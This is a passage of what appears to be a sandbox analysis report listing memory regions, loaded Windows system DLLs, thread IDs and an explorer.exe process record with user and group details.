0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 510 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 511 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 512 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 513 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 514 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 515 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 516 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 517 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 518 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 519 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 520 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 521 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 522 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 523 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 524 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 525 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 526 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 527 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1163 start_va = 0x600000 end_va = 0x601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2776 start_va = 0x600000 end_va = 0x601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2816 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 2823 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2824 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2825 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2826 start_va = 0xb20000 end_va = 0xb21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2967 start_va = 0x7fff9fad0000 end_va = 0x7fff9fd06fff monitored = 0 entry_point = 0x7fff9fc10970 region_type = mapped_file name = "windows.devices.bluetooth.dll" filename = "\\Windows\\System32\\Windows.Devices.Bluetooth.dll" (normalized: "c:\\windows\\system32\\windows.devices.bluetooth.dll") Region: id = 2968 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2969 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2970 start_va = 0x7fffa90e0000 end_va = 0x7fffa9117fff monitored = 0 entry_point = 0x7fffa90e2200 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 2971 start_va = 0x7fffb2fe0000 end_va = 0x7fffb3032fff monitored = 0 entry_point = 0x7fffb2ff0bd0 region_type = mapped_file name = "biwinrt.dll" filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll") Region: id = 2972 start_va = 0x7fff9f9d0000 end_va = 0x7fff9fac1fff monitored = 0 entry_point = 0x7fff9fa5cb50 region_type = mapped_file name = "windows.networking.dll" filename = "\\Windows\\System32\\Windows.Networking.dll" (normalized: "c:\\windows\\system32\\windows.networking.dll") Region: id = 2973 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 2974 start_va = 0x7fffc8f60000 end_va = 0x7fffc8ff2fff monitored = 0 entry_point = 0x7fffc8f68f80 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2975 start_va = 0x7fffc95e0000 end_va = 0x7fffc96a9fff monitored = 0 entry_point = 0x7fffc960bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2976 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2977 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2978 start_va = 0x7fffc8f30000 end_va = 0x7fffc8f5efff monitored = 0 entry_point = 0x7fffc8f372e0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2981 start_va = 0xb20000 end_va = 0xb21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3367 start_va = 0x7fffc3480000 end_va = 0x7fffc3493fff monitored = 0 entry_point = 0x7fffc3489810 region_type = mapped_file name = "capabilityaccesshandlers.dll" filename = "\\Windows\\System32\\CapabilityAccessHandlers.dll" (normalized: "c:\\windows\\system32\\capabilityaccesshandlers.dll") Region: id = 3404 start_va = 0x7fffbf6a0000 end_va = 0x7fffbf81ffff monitored = 0 entry_point = 0x7fffbf6c7430 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 3405 start_va = 0x7fffc0190000 end_va = 0x7fffc0214fff monitored = 0 entry_point = 0x7fffc01b0b70 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 3406 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3407 start_va = 0x7fffc9ec0000 end_va = 0x7fffc9eebfff monitored = 0 entry_point = 0x7fffc9ec7370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3408 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 4000 start_va = 0xb20000 end_va = 0xb21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 4001 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 4805 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Thread: id = 12 os_tid = 0xf3c Thread: id = 13 os_tid = 0x440 Thread: id = 14 os_tid = 0xb78 Thread: id = 15 os_tid = 0x11fc Thread: id = 16 os_tid = 0xb1c Thread: id = 17 os_tid = 0xc6c Thread: id = 18 os_tid = 0x120c Thread: id = 19 os_tid = 0x17fc Thread: id = 20 os_tid = 0x17e0 Thread: id = 21 os_tid = 0x17d4 Thread: id = 22 os_tid = 0x155c Thread: id = 23 os_tid = 0x834 Thread: id = 24 os_tid = 0x424 Thread: id = 25 os_tid = 0x958 Thread: id = 26 os_tid = 0xdd4 Thread: id = 27 os_tid = 0xed0 Thread: id = 28 os_tid = 0x784 Thread: id = 29 os_tid = 0x678 Thread: id = 246 os_tid = 0x1300 Thread: id = 247 os_tid = 0x12dc Thread: id = 337 os_tid = 0x670 Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x5a6ff000" os_pid = "0xa64" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 542 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 543 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 544 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 545 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 546 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 547 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 548 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 549 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 550 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 551 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 552 start_va = 0x1f0000 end_va = 0x1f5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 553 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 554 start_va = 0x400000 end_va = 0x409fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "combase.dll.mui" filename = "\\Windows\\System32\\en-US\\combase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\combase.dll.mui") Region: id = 555 start_va = 0x410000 end_va = 0x411fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 556 start_va = 0x420000 end_va = 0x422fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 557 start_va = 0x430000 end_va = 0x431fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 558 start_va = 0x440000 end_va = 0x444fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 559 start_va = 0x450000 end_va = 0x470fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mun" filename = "\\Windows\\SystemResources\\stobject.dll.mun" (normalized: "c:\\windows\\systemresources\\stobject.dll.mun") Region: id = 560 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 561 start_va = 0x490000 end_va = 0x497fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 562 start_va = 0x4a0000 end_va = 0x4a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 563 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 564 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 565 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 566 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 567 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 568 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 569 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 570 start_va = 0x520000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000006.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000006.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000006.db") Region: id = 571 start_va = 0x540000 end_va = 0x54bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dsreg.dll.mui" filename = "\\Windows\\System32\\en-US\\dsreg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dsreg.dll.mui") Region: id = 572 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 573 start_va = 0x650000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 574 start_va = 0x6d0000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 575 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 576 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 577 start_va = 0x770000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 578 start_va = 0x780000 end_va = 0x783fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 579 start_va = 0x790000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 580 start_va = 0x7a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 581 start_va = 0x9a0000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 582 start_va = 0xb30000 end_va = 0x1f30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 583 start_va = 0x1f40000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 584 start_va = 0x1fc0000 end_va = 0x1fc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fc0000" filename = "" Region: id = 585 start_va = 0x1fd0000 end_va = 0x1fd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fd0000" filename = "" Region: id = 586 start_va = 0x1fe0000 end_va = 0x1fe1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 587 start_va = 0x1ff0000 end_va = 0x1ffafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 588 start_va = 0x2000000 end_va = 0x2001fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002000000" filename = "" Region: id = 589 start_va = 0x2010000 end_va = 0x201bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 590 start_va = 0x2020000 end_va = 0x2020fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 591 start_va = 0x2030000 end_va = 0x203bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002030000" filename = "" Region: id = 592 start_va = 0x2040000 end_va = 0x2043fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 593 start_va = 0x2050000 end_va = 0x2051fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 594 start_va = 0x2060000 end_va = 0x2061fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002060000" filename = "" Region: id = 595 start_va = 0x2070000 end_va = 0x2071fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 596 start_va = 0x2080000 end_va = 0x2081fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002080000" filename = "" Region: id = 597 start_va = 0x2090000 end_va = 0x2091fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002090000" filename = "" Region: id = 598 start_va = 0x20a0000 end_va = 0x20a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 599 start_va = 0x20b0000 end_va = 0x20b5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowszones.res" filename = "\\Windows\\Globalization\\ICU\\windowsZones.res" (normalized: "c:\\windows\\globalization\\icu\\windowszones.res") Region: id = 600 start_va = 0x20c0000 end_va = 0x20c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 601 start_va = 0x20d0000 end_va = 0x20d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020d0000" filename = "" Region: id = 602 start_va = 0x20e0000 end_va = 0x20e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 603 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 604 start_va = 0x2100000 end_va = 0x2101fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 605 start_va = 0x2110000 end_va = 0x2111fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 606 start_va = 0x2120000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 607 start_va = 0x2130000 end_va = 0x2467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 608 start_va = 0x2470000 end_va = 0x2471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 609 start_va = 0x2480000 end_va = 0x2481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 610 start_va = 0x2490000 end_va = 0x24a4fff monitored = 0 entry_point = 0x2492110 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 611 start_va = 0x24b0000 end_va = 0x24c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 612 start_va = 0x24d0000 end_va = 0x24d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 613 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 614 start_va = 0x24f0000 end_va = 0x2550fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 615 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 616 start_va = 0x25e0000 end_va = 0x25e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 617 start_va = 0x25f0000 end_va = 0x25f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 618 start_va = 0x2600000 end_va = 0x2600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 619 start_va = 0x2610000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002610000" filename = "" Region: id = 620 start_va = 0x2620000 end_va = 0x2621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 621 start_va = 0x2630000 end_va = 0x2631fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "twinui.pcshell.dll.mui" filename = "\\Windows\\System32\\en-US\\twinui.pcshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\twinui.pcshell.dll.mui") Region: id = 622 start_va = 0x2640000 end_va = 0x2643fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "2222399582.pri" filename = "\\Windows\\rescache\\_merged\\1840795356\\2222399582.pri" (normalized: "c:\\windows\\rescache\\_merged\\1840795356\\2222399582.pri") Region: id = 623 start_va = 0x2650000 end_va = 0x2651fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 624 start_va = 0x2660000 end_va = 0x2664fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll.mui" filename = "\\Windows\\System32\\en-US\\oleaccrc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\oleaccrc.dll.mui") Region: id = 625 start_va = 0x2670000 end_va = 